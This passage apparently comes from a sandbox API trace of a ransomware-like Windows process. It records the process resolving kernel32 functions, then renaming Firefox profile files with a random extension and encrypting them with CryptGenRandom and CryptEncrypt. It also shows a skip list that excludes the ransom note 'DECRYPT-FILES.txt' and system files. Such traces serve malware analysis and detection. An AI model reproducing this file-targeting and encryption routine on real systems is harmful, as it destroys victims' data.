out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0081.045] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0081.045] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0081.045] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0081.045] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0081.046] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0081.046] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0081.046] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0081.046] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0081.046] lstrlenA (lpString="CREATEPIPE") returned 10 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0081.046] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0081.046] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0081.046] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0081.046] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0081.046] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0081.046] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0081.046] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0081.046] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0081.046] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0081.046] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0081.046] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0081.046] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0081.046] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0081.046] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0081.047] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0081.047] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0081.047] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0081.047] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0081.047] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0081.047] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0081.047] lstrlenA (lpString="CREATETHREAD") returned 12 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0081.047] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0081.047] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0081.047] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0081.047] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0081.047] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0081.047] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0081.047] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0081.047] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0081.047] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0081.047] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0081.047] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0081.047] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0081.048] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0081.048] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0081.048] lstrlenA (lpString="CTRLROUTINE") returned 11 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0081.048] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0081.048] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0081.048] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0081.048] lstrlenA (lpString="DEBUGBREAK") returned 10 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0081.048] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0081.048] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0081.048] lstrlenA (lpString="DECODEPOINTER") returned 13 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0081.048] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0081.048] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0081.048] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0081.048] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0081.048] lstrlenA (lpString="DELETEATOM") returned 10 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0081.048] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0081.048] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0081.048] lstrlenA (lpString="DELETEFIBER") returned 11 [0081.048] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0081.049] lstrlenA (lpString="DELETEFILEA") returned 11 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0081.049] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0081.049] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0081.049] lstrlenA (lpString="DELETEFILEW") returned 11 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0081.049] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0081.049] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0081.049] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0081.049] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0081.049] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0081.049] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0081.049] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0081.049] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0081.049] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0081.049] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0081.049] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0081.049] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0081.049] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0081.049] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0081.049] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0081.050] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0081.050] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0081.050] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0081.050] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0081.050] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0081.050] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0081.050] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0081.050] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0081.050] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0081.050] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0081.050] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0081.050] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0081.050] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0081.050] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0081.050] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0081.050] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0081.050] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0081.050] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0081.050] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0081.051] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0081.051] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0081.051] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0081.051] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini") returned 102 [0081.051] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB") returned 108 [0081.051] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.tH2DB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini.th2db"), dwFlags=0x0) returned 1 [0081.052] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.052] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.052] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.052] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb45b48b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb45b48b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb4b0fa30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x70000, dwReserved0=0x0, dwReserved1=0x0, cFileName="extensions.sqlite", cAlternateFileName="EXTENS~1.SQL")) returned 1 [0081.052] lstrcmpiW (lpString1="extensions.sqlite", lpString2="DECRYPT-FILES.txt") returned 1 [0081.052] lstrcmpiW (lpString1="extensions.sqlite", lpString2="autorun.inf") returned 1 [0081.052] lstrcmpiW (lpString1="extensions.sqlite", lpString2="boot.ini") returned 1 [0081.052] lstrcmpiW (lpString1="extensions.sqlite", lpString2="desktop.ini") returned 1 [0081.052] lstrcmpiW (lpString1="extensions.sqlite", lpString2="ntuser.dat") returned -1 [0081.052] lstrcmpiW (lpString1="extensions.sqlite", lpString2="iconcache.db") returned -1 [0081.053] lstrcmpiW (lpString1="extensions.sqlite", lpString2="bootsect.bak") returned 1 [0081.053] lstrcmpiW (lpString1="extensions.sqlite", lpString2="ntuser.dat.log") returned -1 [0081.053] lstrcmpiW (lpString1="extensions.sqlite", lpString2="thumbs.db") returned -1 [0081.053] lstrcmpiW (lpString1="extensions.sqlite", lpString2="Bootfont.bin") returned 1 [0081.053] lstrlenW (lpString="extensions.sqlite") returned 17 [0081.053] lstrcmpiW (lpString1="sqlite", lpString2="lnk") returned 1 [0081.053] lstrcmpiW (lpString1="sqlite", lpString2="exe") returned 1 [0081.053] lstrcmpiW (lpString1="sqlite", lpString2="sys") returned -1 [0081.053] lstrcmpiW (lpString1="sqlite", lpString2="dll") returned 1 [0081.053] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0081.053] lstrlenW (lpString="extensions.sqlite") returned 17 [0081.053] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0081.053] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="extensions.sqlite" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" [0081.053] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0081.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.sqlite"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0081.053] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=458752) returned 1 [0081.053] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0081.054] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x37e0000 [0081.055] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0081.055] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0081.056] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0081.058] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0081.059] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0081.095] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0081.096] UnmapViewOfFile (lpBaseAddress=0x37e0000) returned 1 [0081.100] CloseHandle (hObject=0x464) returned 1 [0081.100] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 